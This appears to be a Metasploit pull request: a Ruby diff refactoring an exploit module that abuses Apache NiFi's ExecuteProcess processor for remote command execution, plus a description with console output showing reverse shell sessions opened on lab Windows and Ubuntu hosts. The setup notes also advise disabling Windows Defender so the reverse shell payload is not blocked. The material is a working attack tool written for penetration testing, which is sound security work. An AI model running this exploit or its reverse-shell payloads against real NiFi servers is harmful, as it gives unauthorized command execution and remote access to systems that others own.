-    opts = { 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'processors', processor, 'threads') }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    opts = { 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'threads') }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
-    check_response("DELETEing processor #{processor} terminate threads command", response, 200)
+    check_response("DELETEing processor #{@processor} terminate threads command", response, 200)
   end
 
-  def delete_processor(processor, token)
+  def delete_processor
     opts = {
       'method' => 'DELETE',
-      'uri' => normalize_uri(target_uri.path, 'processors', processor),
+      'uri' => normalize_uri(target_uri.path, 'processors', @processor),
       'vars_get' => { 'version' => 3 }
     }
-    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
     response = send_request_cgi(opts)
-    check_response("DELETEting processor #{processor}", response, 200)
+    check_response("DELETEting processor #{@processor}", response, 200)
   end
 
   def check
@@ -191,6 +184,9 @@ class MetasploitModule < Msf::Exploit::Remote
     #      expected response
     # * "Appears" if login is not required because it has confirmed that Nifi is running because it got the expected
     #      response and if there is no authentication then there is no way of restricting the ExecuteCode permimssion
+
+    @cleanup_required = false
+
     response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'access', 'config') })
     if !response
       CheckCode::Unknown
@@ -213,18 +209,43 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def retrieve_token
-    response = send_request_cgi({
-                                  'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'access', 'token'),
-                                  'vars_post' => { 'username' => datastore['USERNAME'],
-                                                   'password' => datastore['PASSWORD'] }
-                                })
+    response = send_request_cgi(
+      {
+        'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'access', 'token'),
+        'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }
+      }
+    )
     check_response('POSTing credentials', response, 201)
     token = response.body
     token
   end
 
+  def cleanup
+    return unless @cleanup_required
+
+    # Wait for thread to execute - This seems necesarry, especially on Windows
+    # and there is no way I can see of checking whether the thread has executed
+    print_status("Waiting #{datastore['DELAY']} seconds before stopping and deleting")
+    sleep(datastore['DELAY'])
+
+    # Stop Processor
+    stop_processor
+    vprint_good("Stopped and terminated processor #{@processor}")
+
+    # Delete processor
+    delete_processor
+    vprint_good("Deleted processor #{@processor}")
+  end
+
   def exploit
+    @cleanup_required = false
+
     validate_config
+
+    checked = check
+    unless (checked == CheckCode::Appears) || (checked == CheckCode::Detected)
+      fail_with(Failure::UnexpectedReply, 'Apache NiFi not detected')
+    end
 
     # Check whether login is required and set/fetch token
     if supports_login
@@ -232,20 +253,24 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::BadConfig,
                   'Authentication is required. Bearer-Token or Username and Password must be specified')
       end
-      token = if !datastore['BEARER-TOKEN'].to_s.empty?
-                datastore['BEARER-TOKEN']
-              else
-                retrieve_token
-              end
+      @token = if !datastore['BEARER-TOKEN'].to_s.empty?
+                 datastore['BEARER-TOKEN']
+               else
+                 retrieve_token
+               end
+    else
+      @token = false
     end
 
     # Retrieve root process group
-    process_group = get_process_group(token)
+    process_group = fetch_process_group
     vprint_good("Retrieved process group: #{process_group}")
 
+    @cleanup_required = true
+
     # Create processor in root process group
-    processor = create_processor(process_group, token)
-    vprint_good("Created processor #{processor} in process group #{process_group}")
+    @processor = create_processor(process_group)
+    vprint_good("Created processor #{@processor} in process group #{process_group}")
 
     # Generate command
     case target['Type']
@@ -256,7 +281,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # below for why BadChars didn't cut it. The solution used is to wrap up command in a cmd /C "payload" command and
       # use powershell's Stop-parsing token (--%) to remove the need to perform any escaping of metacharacter. This
       # command is then base64 encoded and run with -e/-EncodedCommand. This allows commands including double quotes and
-      #  dollar signs (etc.) to be passed to cmd.exe
+      # dollar signs (etc.) to be passed to cmd.exe
       #
       # This method was chosen rather than using
       #   BadChars => '"'
@@ -271,20 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Using command #{cmd}")
 
     # Configure processor and run command
-    configure_processor(processor, cmd, token)
-    vprint_good("Configured processor #{processor} and ran command")
-
-    # Wait for thread to execute - This seems necesarry, especially on Windows
-    # and there is no way I can see of checking whether the thread has executed
-    print_status("Waiting #{datastore['DELAY']} seconds before stopping and deleting")
-    sleep(datastore['DELAY'])
-
-    # Stop Processor
-    stop_processor(processor, token)
-    vprint_good("Stopped and terminated processor #{processor}")
-
-    # Delete processor
-    delete_processor(processor, token)
-    vprint_good("Deleted processor #{processor}")
+    configure_processor(cmd)
+    vprint_good("Configured processor #{@processor} and ran command")
   end
 end


### PR DESCRIPTION
# Add new module: /exploits/multi/http/apache_nifi_processor_rce.rb

## Description

This module exploits a weak configuration in Apache NiFi that can lead to remote command execution. NiFi includes a number of processors by deafault, including the ExecuteProcess processor that can be used to run system commands. There are other "dangerous" processors, such as ExecuteScript, but they require those scripting languages to be installed on the systems being exploited, and the processors are marked as "Experimental". ExecuteProcess was chosen because it is not experimental and doesn't rely on anything else being installed.

The NiFi API is used to create, configure and run a command using the ExecuteProcess processor and then the processor is stopped and deleted.

The API must be unsecured (or credentials/token provided) and the ExecuteProcess processor must be available. The default installation of NiFi is unsecured and runs over HTTP. It is possible to secure it and run over HTTPS, but the authentication must take place using an external provider, such as LDAP or Kerberos. If authentication is enabled, it is possible to restrict access for an authenticated user such that processors cannot be created, or even to allow processors, but not allows "unsafe" processors (e.g. ExecuteProcess) to be created.

## Example output

Note that the first target (Windows 10.0.18363 Pro) does not requires authentication, however the the instance the second target (Ubuntu Server 20.04.1) does. It can be seen that it fails the first time, but succeeds after credentials are set. The version of NiFi that was installed on both platforms was 1.12.0.

````
$ msfconsole -qr metasploit-nifi.rc
[*] Processing metasploit-nifi.rc for ERB directives.
resource (metasploit-nifi.rc)> use multi/http/apache_nifi_processor_rce
[*] Using configured payload cmd/unix/reverse_bash
resource (metasploit-nifi.rc)> set lhost 192.168.194.131
lhost => 192.168.194.131
resource (metasploit-nifi.rc)> set target 1
target => 1
resource (metasploit-nifi.rc)> set rhost 192.168.194.140
rhost => 192.168.194.140
resource (metasploit-nifi.rc)> check
[*] 192.168.194.140:8080 - The target appears to be vulnerable.
resource (metasploit-nifi.rc)> run -z
[*] Started reverse TCP handler on 192.168.194.131:4444 
[*] Waiting 5 seconds before stopping and deleting
[*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.140:50008) at 2020-10-03 13:17:58 +0100
[*] Session 1 created in the background.
resource (metasploit-nifi.rc)> set target 0
target => 0
resource (metasploit-nifi.rc)> set rhost 127.0.0.1
rhost => 127.0.0.1
resource (metasploit-nifi.rc)> set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
resource (metasploit-nifi.rc)> set rport 9443
rport => 9443
resource (metasploit-nifi.rc)> check
[*] 127.0.0.1:9443 - The service is running, but could not be validated.
resource (metasploit-nifi.rc)> run -z
[*] Started reverse TCP handler on 192.168.194.131:4444 
[-] Exploit aborted due to failure: bad-config: Authentication is required. Bearer-Token or Username and Password must be specified
[*] Exploit completed, but no session was created.
resource (metasploit-nifi.rc)> set username admin
username => admin
resource (metasploit-nifi.rc)> set password admin
password => admi
resource (metasploit-nifi.rc)> run -z
[*] Started reverse TCP handler on 192.168.194.131:4444 
[*] Waiting 5 seconds before stopping and deleting
[*] Command shell session 2 opened (192.168.194.131:4444 -> 192.168.194.130:50802) at 2020-10-03 13:18:00 +0100
[*] Session 2 created in the background.
msf5 exploit(multi/http/apache_nifi_processor_rce) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell cmd/windows  Microsoft Windows [Version 10.0.18363.1082] (c) 2019 Microsoft Corporation. A...  192.168.194.131:4444 -> 192.168.194.140:50008 (192.168.194.140)
  2         shell cmd/unix                                                                                       192.168.194.131:4444 -> 192.168.194.130:50802 (127.0.0.1)

msf5 exploit(multi/http/apache_nifi_processor_rce) > 
````

## Setting up test environments

### On Windows

1. Download the NiFi binaries zip file from https://nifi.apache.org/download.html
2. Extract the files
3. Run `bin\run-nifi.bat`
4. NiFi will be available over HTTP on port 8080
5. Disable Windows Defender to that it doesn't block the reverse shell payload

### On Linux

1. Download the NiFi binaries tar.gz file from https://nifi.apache.org/download.html
2. Extract the files
3. Run `bin/nifi.sh start`
4. NiFi will be available over HTTP on port 8080

### Enabling authentication on Linux

1. Download the NiFi toolkit tar.gz from https://nifi.apache.org/download.html
2. Extract the files
3. Follow the guide to configure & enable TLS https://nifi.apache.org/docs/nifi-docs/html/walkthroughs.html#securing-nifi-with-tls-toolkit
4. NiFi will be available over HTTPS on port 9443 (bound to localhost only)
4. Ensure that you can authenticate using the client certificate that was created
5. Follow the guide to install openldap and configure NiFi to use it https://ijokarumawak.github.io/nifi/2016/11/15/nifi-auth/
6. Ensure that you can authenticate using admin/admin credentials (reject client certificate prompt)
7. Re-authenticate using the certificate and add the required permissions to the admin account to enable creation of the ExecuteProcess processor.

## Verification

See the Example Output section above for an example of how to use the exploit against systems that do and don't require authentication.